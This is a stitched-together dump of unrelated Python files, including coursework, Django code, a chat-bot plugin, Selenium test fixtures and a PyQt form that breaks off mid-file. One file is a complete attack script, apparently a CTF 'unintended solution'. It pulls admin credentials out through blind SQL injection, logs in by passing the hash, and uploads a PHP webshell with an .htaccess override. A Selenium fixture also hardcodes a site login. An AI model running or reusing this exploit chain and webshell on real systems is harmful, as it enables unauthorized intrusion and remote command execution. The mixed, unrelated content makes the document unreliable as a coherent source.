import numpy as np
# Read an m x n integer matrix from the user, then zero out the strict
# upper triangle (every element above the main diagonal).
m = int(input('Enter rows'))
n = int(input('Enter columns'))
b = []
for i in range(m):
    row = []
    for j in range(n):
        e = int(input('Enter element: '))
        row.append(e)
    b.append(row)
print("Original matrix")
print(np.matrix(b))
for i in range(m):
    for j in range(n):
        # Direct condition replaces the original inverted
        # `if i > j or i == j: continue / else:` construction.
        if i < j:
            b[i][j] = 0
print("Changed matrix")
print(np.matrix(b))
|
###################################
# CS B551 Fall 2020, Assignment #3
#
# Your names and user ids:
# Alex Fuerst (alfuerst), Andrew Corum (amcorum), Kaitlynne Wilkerson (kwilker)
#
# (Based on skeleton code by D. Crandall)
#
import random
import math
import define
import prob
import simple
import viterbi
# We've set up a suggested code structure, but feel free to change it. Just
# make sure your code still works with the label.py and pos_scorer.py code
# that we've supplied.
#
class Solver:
    # Calculate the log of the posterior probability of a given sentence
    # with a given part-of-speech labeling. Right now just returns -999 -- fix this!
    def posterior(self, model, sentence, label):
        """Return log10 of the posterior probability of `label` for `sentence`.

        NOTE(review): reads the module-level globals `simpler` / `confidence`
        that only exist after simplified() / confidence() have run; calling
        this first raises NameError. Confirm the call order against label.py.
        """
        if model == "Simple":
            total = 1
            # Product of the per-word probabilities recorded by simplified().
            for i in simpler:
                total *= i
            result = math.log(total,10)
            return result
        elif model == "HMM":
            total = 1
            # Product of the per-word confidences recorded by confidence().
            for i in confidence:
                total *= i
            result = math.log(total, 10)
            return result
        else:
            print("Unknown algo!")
    # Do the training!
    #
    def train(self, data):
        """
        Splits data from file into words and pos. Passes this data to the define file so that the parameters are found.
        """
        for d in data:
            words = d[0]
            pos = d[1]
            define.define(words, pos)
        # Derive start/transition/emission statistics once all counts are in.
        prob.probstart()
        prob.probtran()
        totalwords = prob.probout()
    # Functions for each algorithm. Right now this just returns nouns -- fix this!
    #
    """
    The following 3 functions returns the pos per word.
    """
    def simplified(self, sentence):
        """Tag each word independently with its single most likely POS."""
        new = list(sentence)
        total = prob.totalwords
        simplepath = []
        # `simpler` collects each word's probability for posterior().
        global simpler
        simpler = []
        for i in new:
            (tag, largest) = simple.find(i, total)
            if tag == None: # this works
                #finds tag for word not previously seen
                l = len(simplepath) -1
                if len(simplepath) > 0:
                    l = len(simplepath) -1
                    tag = simple.examineTransition(simplepath[l])
                else:
                    # Sentence start: fall back to the sentence-boundary tag.
                    tag = simple.examineTransition('.')
            simplepath += [tag]
            simpler += [largest]
        return simplepath
    def hmm_viterbi(self, sentence):
        """Tag the sentence with the Viterbi most-probable tag sequence."""
        new = list(sentence)
        total = prob.totalwords
        hmmpath = []
        # `h` collects the per-word scores for later inspection.
        global h
        h = []
        count = 0
        for i in new:
            # First word uses start probabilities; the rest use transitions.
            if count == 0:
                viterbi.start(i, total)
            else:
                viterbi.rest(i, total)
            count += 1
        hmmpath = viterbi.trace()
        hmm = []
        # NOTE(review): assumes trace() yields (score, tag) pairs — confirm
        # against viterbi.py.
        for i in hmmpath:
            hmm += [i[1]]
            h += [i[0]]
        return hmm
    def confidence(self, sentence, answer):
        """Per-word probability of the chosen `answer` tags (for posterior)."""
        # The global list named `confidence` is distinct from this bound
        # method; posterior() reads the global, not the method.
        global confidence
        confidence = []
        for i in range(0, len(sentence)):
            # simple.find() populates simple.con as a side effect.
            simple.find(sentence[i], prob.totalwords)
            pr = simple.con[answer[i]]
            confidence += [pr]
        return confidence
    # This solve() method is called by label.py, so you should keep the interface the
    # same, but you can change the code itself.
    # It should return a list of part-of-speech labelings of the sentence, one
    # part of speech per word.
    #
    """
    Calls the above 3 functions to display to the screen.
    """
    def solve(self, model, sentence):
        if model == "Simple":
            return self.simplified(sentence)
        elif model == "HMM":
            return self.hmm_viterbi(sentence)
        else:
            print("Unknown algo!")
|
def init():
    """Warp the player back to their previous map, or Henesys if unknown.

    Map 100000000 is Henesys; old field 0 means "no previous map" and
    910000000 is excluded as a previous destination. Both identical
    fallback branches of the original are merged into one.
    """
    field_id = sm.getFieldID()  # kept for parity with the original script
    old_field_id = sm.getOldFieldID()
    if old_field_id in (0, 910000000):
        sm.chat("(Portal) Cannot find your previous map ID, warping to Henesys.")
        target_map = 100000000
    else:
        target_map = old_field_id
    # Portal index 0 in every case.
    sm.warp(target_map, 0)
    sm.dispose()
## HW5 - Implementing a Greedy Motif Finder
## Due 10am on Wed., 3/8/17
# Unfinished Portions:
# - Didn't get to the point generator, or most of the Greedy Algorithm, took an unreasonably long time fixing bugs on the frequency table.
## Nick Egan
# Time Estimate: 4
#Notes:
# #DB indicates lines used for debugging/info during runtime
#Citations:
# computeCounts, and computeFrequencies come from work during Lab6.
# Some of GreedyMotifSearch comes from HW4
import pylab
def main():
    """Driver: run the greedy motif search over each test string."""
    #motifString = getBindingSites("simulated-motifs.txt")
    motifString = ["ACCCCGTCCCCC","ACCGTCCCCCCC","ACCCCGTCCCCT"] #DB test strings
    # One best motif per input line; the index doubles as the line number.
    bestMotif = [GreedyMotifSearch(line, 5, number)
                 for number, line in enumerate(motifString)]
    print("HW5 has finished running. Have a nice day!")
    return
def getBindingSites(fileName):
    """Read *fileName* and return its lines (motifs) as a list of strings."""
    with open(fileName, 'r') as handle:
        contents = handle.read()
    # Trim surrounding whitespace, then split into one motif per line.
    lineList = contents.strip().split('\n')
    print('\nMotifs:')
    for pattern in lineList:
        print(pattern)
    return lineList
def GreedyMotifSearch(strand, k, lineCounter):
    """Slide a k-wide window over *strand* and score the collected k-mers.

    Returns the running best motif (currently seeded with the first k-mer;
    the scoring step was left unfinished in the assignment).
    """
    motifs = []
    bestMotifs = ""
    frequencyList = []
    for start in range(len(strand)):
        window = strand[start:start + k]
        if len(window) < k:
            break  # remaining suffix is shorter than k — stop cutting
        if start == 0:
            bestMotifs = window  # first k-mer seeds the running best
        motifs.append(window)
    # Count nucleotide occurrences per position, then normalise them.
    countsArray = computeCounts(motifs)
    frequencyList.append(computeFrequencies(countsArray, lineCounter))
    #motifPointGenerator(motifs, frequencyList)
    return bestMotifs
def computeCounts(motifList):
    """Count A/C/G/T occurrences per index position across *motifList*.

    Returns four parallel lists — counts for A, C, G and T — each as long
    as the first motif.
    """
    width = len(motifList[0])
    counters = {base: [0] * width for base in "ACGT"}
    for motif in motifList:
        for position, base in enumerate(motif):
            if base in counters:
                counters[base][position] += 1
    aCounter = counters["A"]
    cCounter = counters["C"]
    gCounter = counters["G"]
    tCounter = counters["T"]
    print("\nA: ", aCounter) #DB
    print("C: ", cCounter) #DB
    print("G: ", gCounter) #DB
    print("T: ", tCounter) #DB
    return [aCounter, cCounter, gCounter, tCounter]
def computeFrequencies(countListings, motifNumber):
    """Column-normalise the A/C/G/T count matrix into per-position frequencies.

    *countListings* holds four rows (A, C, G, T counts); the result is one
    list of four probabilities per index position, summing to 1.0.
    """
    freqHolder = []
    for position in range(len(countListings[0])):
        column = [row[position] for row in countListings]
        total = float(sum(column))
        freqHolder.append([value / total for value in column])
    print("\nThe number of occurrences of nucleotide per position in motif line number ", motifNumber," are: ", freqHolder)
    return freqHolder
def motifPointGenerator(motif, freq):
    """Return the probability of *motif* under the per-position frequency profile.

    *freq* is one [A, C, G, T] frequency list per index position (as built by
    computeFrequencies); the probability is the product of the frequency of
    each nucleotide at its position.

    Fixes the original stub, which returned the undefined name ``points``
    and therefore always raised NameError.
    """
    index = {"A": 0, "C": 1, "G": 2, "T": 3}
    points = 1.0
    for position, base in enumerate(motif):
        points *= freq[position][index[base]]
    return points
## The lines below will call the main() function
if __name__ == '__main__':
main() |
import csv
import django
django.setup()
import os
from sefaria.model import *
# Walk every CSV in the current directory and sanity-check that the refs in
# each file form a contiguous sequence of segments.
files = [f for f in os.listdir(".") if f.endswith(".csv")]
for f in files:
    prev_ref = None
    print(f)
    with open(f, 'r') as open_f:
        for row in csv.reader(open_f):
            # Each row is expected to be (ref string, commentary text).
            ref, comm = row
            try:
                ref = Ref(ref)
                # NOTE(review): prev_ref is only ever assigned when it is
                # already truthy, so it stays None forever and neither branch
                # runs — suspected bug (likely missing `else: prev_ref = ref`
                # for the first row). Confirm intent before fixing.
                if prev_ref and ref.prev_segment_ref(prev_ref):
                    prev_ref = ref
                elif prev_ref:
                    print("Problem at {}".format(ref))
                    break
            except:
                # NOTE(review): bare except silently skips rows whose ref
                # fails to parse (and swallows everything else, including
                # KeyboardInterrupt) — consider narrowing.
                pass
|
class MyMiddleware:
    """Copy session identity and authorization data into request.META.

    Sets META['end-user'] and META['Authorization'] from the session,
    or None when the corresponding session key is absent.
    """

    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        session = request.session
        for session_key, meta_key in (('id', 'end-user'),
                                      ('Authorization', 'Authorization')):
            request.META[meta_key] = session.get(session_key) if session_key in session else None
        return self.get_response(request)
|
from abc import abstractmethod
from typing import Dict, List
from src.dialog.common.manage_entity.ManageEntityDialogMode import ManageEntityDialogMode
from src.property.Property import Property
from src.property.PropertyValue import PropertyValue
from src.template.property.PropertyTemplate import PropertyTemplate
class ManageEntityFuncs:
    """Callback interface supplied to the manage-entity dialog.

    Concrete implementations provide the entity's metadata, its current
    property values, and persistence hooks.
    """

    @abstractmethod
    def get_mode(self) -> ManageEntityDialogMode:
        """Return whether the dialog is creating or editing an entity."""
        pass

    @abstractmethod
    def get_entity_key_property_id(self) -> str:
        """Return the id of the property used as the entity's key."""
        pass

    # NOTE(review): every sibling is @abstractmethod — this one likely lost
    # the decorator by accident, but adding it would break subclasses that
    # don't override it, so it is only flagged here. Confirm intent.
    def get_entity_props_templates(self) -> List[PropertyTemplate]:
        """Return the templates describing the entity's properties."""
        pass

    @abstractmethod
    def get_entity_prop_value(self, prop_id: str) -> PropertyValue:
        """Return the current value of the property *prop_id*."""
        pass

    @abstractmethod
    def save_entity(self, key: str, props: Dict[str, Property]):
        """Persist the entity identified by *key* with the given properties."""
        pass

    @abstractmethod
    def closed_on_x(self):
        """Hook invoked when the dialog is dismissed via its close button."""
        pass
|
from enum import Enum
class EncodingType(Enum):
    """Supported neural-architecture encoding schemes."""

    ADJACENCY_ONE_HOT = "adjacency_one_hot"
    ADJACENCY_MIX = "adjacency_mix"
    PATH = "path"
    GCN = "gcn"
    BONAS = "bonas"
    SEMINAS = "seminas"
    COMPACT = "compact"
|
#!/usr/bin/env python
import cv2
import random
import os
# def check_empty(file):
# return os.stat(file).st_size == 0
# def isclose(a, b, rel_tol=.1, abs_tol=0.0):
# return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
# def crop_save_image(image, x_offset, y_offset, width, height):
# # image_path = "~/Documents/bigram_images/"
# Dir = '/home/vaibhav/Documents/bigram_images/'
# im = 'image_'
# crop = image[0:height, x_offset:width]
# file_name = Dir + im + str(int(random.random()*10000)) + ".png"
# cv2.imwrite(file_name, crop)
# if check_empty(file_name):
# print file_name + " X offset:" + str(x_offset) + "width:" +str(width)
# def sliding_window(image, bigram_size, unigram_size, height, width, word_size):
# X_MIN = 0
# X_MAX = width
# window = bigram_size
# k = 10
# delta = float(unigram_size/k)
# x_min = 0
# x_max = window
# i = float(0)
# print "Delta" + str(delta)
# # while x_max <= X_MAX:
# # change_position = x_min + usz
# # while i + x_min <= change_position and x_max + i <= X_MAX :
# # # print image, x_min + i, height, x_max + i, height
# # if x_max - x_min >= window:
# # crop_save_image(image, x_min + i, height, x_max + i, height)
# # i = i + delta
# # x_min = x_min + usz
# # x_max = x_max + usz
# # i = 0
# while x_max <= X_MAX:
# change_position = x_min + unigram_size
# if isclose(i, change_position):
# x_min = x_min + unigram_size
# x_max = x_max + unigram_size
# elif x_max + i <= X_MAX:
# crop_save_image(image, x_min + i, height, x_max + i, height)
# i = i + delta
# IMG_DIR =
# path = 'move.png'
# img = cv2.imread(path)
# word_size = 4
# height, width = img.shape[:2]
# xmin = 0
# xmax = width
# bsz=float(xmax-xmin)/(word_size*.5)
# usz=float(xmax-xmin)/(word_size)
# print "Bigram size:" + str(bsz) + " Unigram size:" + str(usz) + " Image size " + str(width)
# sliding_window(img,bsz,usz,height,width,word_size)
# Crop the right half of the sample word image and save it.
image = cv2.imread('/home/vaibhav/Documents/test_folder/Images/word1sample1.png')
height, width = image.shape[:2]
# Integer division: on Python 3, width / 2 is a float and float slice
# indices raise TypeError; // works identically on Python 2.
crop = image[0:height, width // 2:width]
cv2.imwrite('crop_image_test_1.png', crop)
|
import json
class questions_store:
    """Loads a list of question records from a JSON file on disk."""

    def __init__(self, file_name):
        # Path of the JSON file backing this store.
        self.data_file = file_name

    def load_questions(self):
        """Read and return the question list from the data file.

        Returns the parsed JSON content on success. On any read/parse
        failure a message is printed and the (empty) item list is
        returned instead of None, so callers can always iterate.
        """
        self.items = []
        try:
            with open(self.data_file) as f:
                # json.load reads straight from the file object;
                # no need for f.read() + json.loads.
                self.items = json.load(f)
        except (OSError, ValueError):
            # OSError: missing/unreadable file; ValueError covers
            # json.JSONDecodeError for malformed content.
            print("Couldn't read data from store")
        return self.items
class question_info:
    """Lightweight record describing one question cell in the DP matrix."""

    def __init__(self, question_id, is_selected, question_marks):
        # Identifier of the question this cell refers to.
        self.question_id = question_id
        # Whether the question is part of the current selection.
        self.is_selected = is_selected
        # Marks awarded for the question.
        self.question_marks = question_marks
|
# print('让我看看你是啥', demo4.func())
from demo3 import demo7
# print(demo7)
# def func2():
# return "demo2进入执行"
|
# Generated by Django 2.2.6 on 2019-10-15 06:27
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Add created/updated timestamps to Ad and Trainer, and align the
    two-letter 'size' choice set across the report models."""

    dependencies = [
        ('publications', '0001_initial'),
    ]
    operations = [
        # 'created' needs a one-off default (timezone.now) to backfill
        # existing rows; preserve_default=False drops that default from
        # the model afterwards.
        migrations.AddField(
            model_name='ad',
            name='created',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='fecha de creación'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='ad',
            name='updated',
            field=models.DateTimeField(auto_now=True, verbose_name='fecha de edición'),
        ),
        migrations.AddField(
            model_name='trainer',
            name='created',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='fecha de creación'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='trainer',
            name='updated',
            field=models.DateTimeField(auto_now=True, verbose_name='fecha de edición'),
        ),
        # The same size choices are applied to every model carrying one.
        migrations.AlterField(
            model_name='adoption',
            name='size',
            field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
        ),
        migrations.AlterField(
            model_name='cross',
            name='size',
            field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
        ),
        migrations.AlterField(
            model_name='finding',
            name='size',
            field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
        ),
        migrations.AlterField(
            model_name='straying',
            name='size',
            field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
        ),
    ]
|
### Unintended solution ###
# @giovannichhatta
import hashlib, string, requests, sys, argparse
# Command-line interface: the target host is required; bail out with
# usage text when it is missing.
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="IP address of the target.")
args = parser.parse_args()
if not args.target:
    parser.print_help()
    sys.exit(0)
# HTTP traffic is routed through a local intercepting proxy (e.g. Burp)
# for the requests that pass proxies=PROXY.
PROXY = {
    "http" : "http://127.0.0.1:8080"
}
TARGET = args.target
def sha1(string):
    """Return the hex SHA-1 digest of *string* (UTF-8 encoded)."""
    # The original had a no-op `string = string` and a three-step
    # hashlib dance; hashlib.sha1 accepts the data directly.
    return hashlib.sha1(string.encode('utf-8')).hexdigest()
def Upload(username, password, filename, fileContent):
    """Upload *fileContent* as *filename* through the admin panel.

    *password* is the already-computed admin hash (pass-the-hash);
    Login(..., True) returns the admin session cookies. The multipart
    body is built by hand so the boundary and filename are fully
    controlled — note the `filename` parameter is NOT interpolated into
    `data`; the literal filename in the body is fixed.
    """
    url = f"http://{TARGET}/admin/welcome.php"
    # admin=True makes Login return the raw session cookies.
    cookies = Login(username, password, True)
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------324239038032575636314150475280", "Origin": "http://192.168.206.189", "Connection": "close", "Referer": f"http://{TARGET}/admin/welcome.php", "Upgrade-Insecure-Requests": "1"}
    # Boundary here must match the Content-Type header above.
    data = f"-----------------------------324239038032575636314150475280\r\nContent-Disposition: form-data; name=\"file\"; filename=\"(unknown)\"\r\nContent-Type: text/plain\r\n\r\n{fileContent}\r\n-----------------------------324239038032575636314150475280\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload\r\n-----------------------------324239038032575636314150475280--\r\n"
    requests.post(url, headers=headers, cookies=cookies, data=data)
def Login(username, password='test', admin=False):
    """Log in and return the session cookies (admin) or the length of
    the user_log page via CheckResponse (regular user)."""
    if admin:
        # Admin path: the caller supplies the final hash as-is.
        url = f"http://{TARGET}/admin/login.php"
    else:
        # Regular path: mimic the client-side double-hash-with-salt scheme.
        password = sha1(sha1(password) + "swag")
        url = f"http://{TARGET}/login.php"
    payload = {"form_password_hidden": password, "username": username, "password": '', "submit": "Submit","token" : "swag"}
    session = requests.session()
    session.post(url, data=payload, proxies=PROXY)
    cookies = session.cookies.get_dict()
    if admin:
        return cookies
    return CheckResponse(cookies)
def CheckResponse(cookies):
    """Return the body length of the user_log page for *cookies*
    (used as the boolean oracle for the blind injection)."""
    response = requests.get(f"http://{TARGET}/user_log.php", cookies=cookies, proxies=PROXY)
    return len(response.content)
def Register(payload, password='test'):
    """Register an account whose username is *payload* (the SQLi probe),
    then log in with it and return the length oracle from Login."""
    url = f"http://{TARGET}/register.php"
    form = {
        "form_password_hidden": sha1(password),
        "username": payload,
        "password": '',
        "register": "Submit",
    }
    requests.post(url, data=form)
    return Login(payload)
def Bruteforce(payload):
    """Extract a string character-by-character via blind SQL injection.

    *payload* carries two placeholders: [C] is the 1-based character
    index and [P] the candidate character.  Register() returns a page
    length, so a length differing from the always-false baseline means
    the guess was correct.
    """
    # Baseline response length for a predicate that is always false.
    FALSERESPONSE = Register("' or 1=2 -- -")
    index = 1
    falseInARow = 0
    output = ""
    for i in range(1000):
        # string.printable[:-6] drops the 6 whitespace chars (94 left);
        # a full pass with no hit means the target string is exhausted.
        if falseInARow > 96:
            break
        for char in string.printable[:-6]:
            if Register(payload.replace("[P]",char).replace("[C]", str(index))) != FALSERESPONSE:
                # Hit: record the character, echo it live, advance.
                falseInARow = 0
                output += char
                sys.stdout.write(char)
                sys.stdout.flush()
                index += 1
                break
            else:
                falseInARow += 1
    print()
    return output
def UploadShell(username, password):
    """Drop an (empty) .htaccess override and a PHP webshell through the
    admin upload, in that order."""
    for name, content in ((".htaccess", ""), ("shell.pHp", "<?php system($_GET[0]); ?>")):
        Upload(username, password, name, content)
def Main():
    """Full chain: blind-SQLi the admin credentials, then pass the hash
    and drop a webshell via the admin upload."""
    print("Fetching Username: ", end='')
    username = Bruteforce("' or (SELECT SUBSTRING(username,[C],1) from admin where id = 1) = '[P]' -- -")
    print("Fetching password: ", end='')
    stored_hash = Bruteforce("' or (SELECT SUBSTRING(password,[C],1) from admin where id = 1) = '[P]' -- -")
    # Re-salt the recovered hash the way the admin login expects it.
    password = sha1(stored_hash + "swag")
    print(f"Passing the hash with {password}")
    UploadShell(username, password)
# Entry point: run the exploit chain only when executed as a script.
if __name__ == '__main__':
    Main()
|
from django.urls import path
from .views import ToolListApiView,ToolDetailApiView, ToolTypesDetailApiView, ToolTypesListApiView, UserRecordView
# URL namespace for reversing, e.g. reverse('api:tool_list').
app_name = 'api'
urlpatterns = [
    # Tool endpoints: list plus a detail view keyed by tool_code.
    path('', ToolListApiView.as_view(), name='tool_list'),
    path('detail/<tool_code>', ToolDetailApiView.as_view(), name='tool_detail'),
    # Tool-type endpoints: list plus a detail view keyed by type_id.
    path('type', ToolTypesListApiView.as_view(), name='type_list'),
    path('type_detail/<type_id>', ToolTypesDetailApiView.as_view(), name='type_detail'),
    # User record endpoint.
    path('user/', UserRecordView.as_view(), name='user' )
] |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import xmpp
def init(bot):
    """Plugin initializer; the returned integer is the load priority."""
    # No setup is needed for this plugin — just report the priority.
    return 50
def description():
    """Short human-readable summary shown in the plugin list."""
    return 'set activity status(XEP-0108)'
#XEP-0108: User Mood
def help():
    """Return the usage text for the setactivity command (XEP-0108)."""
    # Joined once instead of the original chain of `txt = txt + ...`.
    parts = [
        'Set activity status bot (XEP-0108) (v0.1)\n\n',
        'Синтаксис: setactivity статус подстатус текст_статуса\n',
        'Статусы: подстатусы\n',
        '- doing_chores: buying_groceries, cleaning, cooking, doing_maintenance ,doing_the_dishes ,doing_the_laundry, gardening, running_an_errand, walking_the_dog\n',
        '- drinking: having_a_beer, having_coffee, having_tea\n',
        '- eating: having_a_snack, having_breakfast, having_dinner, having_lunch\n',
        '- exercising: cycling, dancing, hiking, jogging, playing_sports, running, skiing, swimming, working_out\n',
        '- grooming: at_the_spa, brushing_teeth, getting_a_haircut, shaving, taking_a_bath, taking_a_shower\n',
        '- having_appointment\n',
        '- inactive: day_off, hanging_out, hiding, on_vacation, praying, scheduled_holiday, sleeping, thinking\n',
        '- relaxing: fishing, gaming, going_out, partying, reading, rehearsing, shopping, smoking, socializing, sunbathing, watching_tv, watching_a_movie\n',
        '- talking: in_real_life, on_the_phone, on_video_phone\n',
        '- traveling: commuting, cycling, driving, in_a_car, on_a_bus, on_a_plane, on_a_train, on_a_trip, walking\n',
        '- working: coding, in_a_meeting, studying, writing\n',
    ]
    return ''.join(parts)
def run(bot,mess):
    """Handle 'setactivity <activity> <subactivity> <status text>':
    publish a XEP-0108 user-activity item over PEP.

    On any parsing or sending failure the usage text is returned instead.
    """
    try:
        text = mess.getBody()
        command = text.split(' ')
        activity=command[1]
        subactivity=command[2]
        # Strip the leading 'setactivity ' prefix...
        text = text[len("setactivity")+1:]
        # ...then skip past '<activity> <subactivity> ' for the free text.
        l = len(activity)+1+len(subactivity)
        text = unicode(text[l+1:])  # NOTE: Python 2 only (unicode builtin)
        item = xmpp.Node('activity', {'xmlns': xmpp.NS_ACTIVITY})
        if activity:
            i = item.addChild(activity)
            i.addChild(subactivity)
        if text:
            i = item.addChild('text')
            i.addData(text)
        # Publish to our own PEP service (empty 'to' JID).
        jid=''
        query = xmpp.Iq('set', to=jid)
        e = query.addChild('pubsub', namespace=xmpp.NS_PUBSUB)
        p = e.addChild('publish', {'node': xmpp.NS_ACTIVITY})
        p.addChild('item', {'id': '0'}, [item])
        bot.send(query)
        txt = 'Status activity set!'
        return xmpp.Message(mess.getFrom(),txt)
    except:
        # Any failure (missing args, XMPP error) falls back to the help text.
        txt = help()
        return xmpp.Message(mess.getFrom(),txt)
|
# For each test case, print the "leaders" of the array: every element
# strictly greater than all elements to its right (the last element is
# always a leader).
n = int(input())
for i in range(n):
    n1 = int(input())
    arr = [int(x) for x in input().split()]
    # Scan right-to-left with a running maximum: O(n) instead of the
    # original max(arr[j+1:]) per element, which was O(n^2).
    leaders = [arr[n1 - 1]]
    right_max = arr[n1 - 1]
    for j in range(n1 - 2, -1, -1):
        if arr[j] > right_max:
            leaders.append(arr[j])
            right_max = arr[j]
    # Collected back-to-front; reverse to keep the original output order.
    leaders.reverse()
    print(*leaders)
|
import pytest
from selenium import webdriver
def pytest_addoption(parser):
    """Register the custom CLI options consumed by the setup fixture."""
    # --userType: which login persona to use (default employee id lo302).
    parser.addoption("--userType", action="store", default="lo302")
    # --browser: chrome (default) or firefox.
    parser.addoption("--browser", action="store", default="chrome")
@pytest.fixture(scope="class")
def setup(request):
    """Class-scoped fixture: start a browser per --browser, log in per
    --userType, attach the driver to the test class, and quit afterwards.

    Fixes over the original:
    - ``userType == "apc" or "tied"`` was always True (a non-empty
      string is truthy); replaced with a membership test.
    - The firefox branch instantiated ``webdriver.Chrome`` with the
      geckodriver path and FirefoxOptions; it now uses ``webdriver.Firefox``.
    - ``driver.quit()`` instead of ``driver.close()`` so the WebDriver
      session is ended, not just the current window.
    """
    browser = request.config.getoption("browser")
    userType = request.config.getoption("userType")
    driver = None
    if browser == "chrome":
        chromeOptions = webdriver.ChromeOptions()
        chromeOptions.add_argument("--start-maximized")
        chromeOptions.add_argument("--disable-gpu")
        driver = webdriver.Chrome(executable_path="E:\\python selenium\\chromedriver_win32\\chromedriver",
                                  options=chromeOptions)
        driver.get("https://genieuat.mykotaklife.com/genie-web/index.html#/login")
        # driver.maximize_window()
        driver.implicitly_wait(120)
        driver.find_element_by_css_selector("button[id='dropdownMenu2']").click()
        # Bug fix: original `userType == "apc" or "tied"` was always True.
        if userType in ("apc", "tied"):
            driver.find_element_by_css_selector("a[domain='Employee']").click()
        if userType == "tied":
            driver.find_element_by_css_selector("input[ng-model='username']").send_keys("lo302")
            driver.find_element_by_css_selector("input[ng-model='password']").send_keys("Genie@1234")
            driver.find_element_by_css_selector("button[ng-click='login()']").click()
    if browser == "firefox":
        firefoxOptions = webdriver.FirefoxOptions()
        firefoxOptions.add_argument("--start-maximized")
        firefoxOptions.add_argument("--disable-gpu")
        # Bug fix: was webdriver.Chrome despite the geckodriver path.
        driver = webdriver.Firefox(executable_path="E:\\python selenium\\geckodriver-v0.29.1-win64\\geckodriver",
                                   options=firefoxOptions)
        driver.get("https://genieuat.mykotaklife.com/genie-web/index.html#/login")
        driver.maximize_window()
        driver.implicitly_wait(30)
        driver.find_element_by_css_selector("button[id='dropdownMenu2']").click()
        if userType in ("apc", "tied"):
            driver.find_element_by_css_selector("a[domain='Employee']").click()
        if userType == "tied":
            driver.find_element_by_css_selector("input[ng-model='username']").send_keys("lo302")
            driver.find_element_by_css_selector("input[ng-model='password']").send_keys("Genie@1234")
            driver.find_element_by_css_selector("button[ng-click='login()']").click()
    request.cls.driver = driver
    yield
    driver.quit()
|
# 导入数据集iris
from sklearn.datasets import load_iris
import numpy as np
import matplotlib.pyplot as plt
# 导入决策树DTC包
from sklearn.tree import DecisionTreeClassifier
# 输出准确率 召回率 F值
from sklearn import metrics
# Load the iris dataset.
iris = load_iris()
# Per-class split: the first 40 samples of each of the three classes go
# to training, the remaining 10 to testing.
train_idx = np.r_[0:40, 50:90, 100:140]
test_idx = np.r_[40:50, 90:100, 140:150]
train_data = iris.data[train_idx, :]
train_target = iris.target[train_idx]
test_data = iris.data[test_idx, :]
test_target = iris.target[test_idx]
print("训练集", train_target)
# Fit a decision tree on the training data only.
clf = DecisionTreeClassifier()
clf.fit(train_data, train_target)
print(clf)
# Predict on the held-out samples.
predict_target = clf.predict(test_data)
print(predict_target)
# Compare predictions with the ground truth.
print(sum(predict_target == test_target),"==========================")
print(metrics.classification_report(test_target, predict_target))
print(metrics.confusion_matrix(test_target, predict_target))
# Extract the first two feature columns of the test set for plotting.
X = test_data
L1 = [n[0] for n in X]
print(L1)
L2 = [n[1] for n in X]
print(L2)
# Plotting (disabled in the original as well):
# plt.scatter(L1, L2, c=predict_target, marker='x')  # cmap=plt.cm.Paired
# plt.rcParams['font.sans-serif'] = ['SimHei']
# plt.title("决策树算法")
# plt.show()
|
from django.contrib import admin
from .models import Cart, Product, Reviews
# Register your models here.
# Expose the shop models in the Django admin site.
admin.site.register(Cart)
admin.site.register(Reviews)
admin.site.register(Product) |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ClassificacaoRisco.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FichaAmbulatorialVerso(object):
def setupUi(self, FichaAmbulatorialVerso):
FichaAmbulatorialVerso.setObjectName("FichaAmbulatorialVerso")
FichaAmbulatorialVerso.resize(662, 997)
FichaAmbulatorialVerso.setStyleSheet("background-color: rgb(192, 255, 218);")
self.centralwidget = QtWidgets.QWidget(FichaAmbulatorialVerso)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 642, 977))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.widgetClassificacaoRisco = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetClassificacaoRisco.setGeometry(QtCore.QRect(20, 350, 611, 551))
self.widgetClassificacaoRisco.setObjectName("widgetClassificacaoRisco")
self.radioVerde = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioVerde.setGeometry(QtCore.QRect(440, 230, 71, 21))
self.radioVerde.setStyleSheet("color: rgb(0, 255, 0);\n"
"background-color: rgb(0, 0, 0);")
self.radioVerde.setObjectName("radioVerde")
self.labelSaturacao = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelSaturacao.setGeometry(QtCore.QRect(0, 260, 71, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
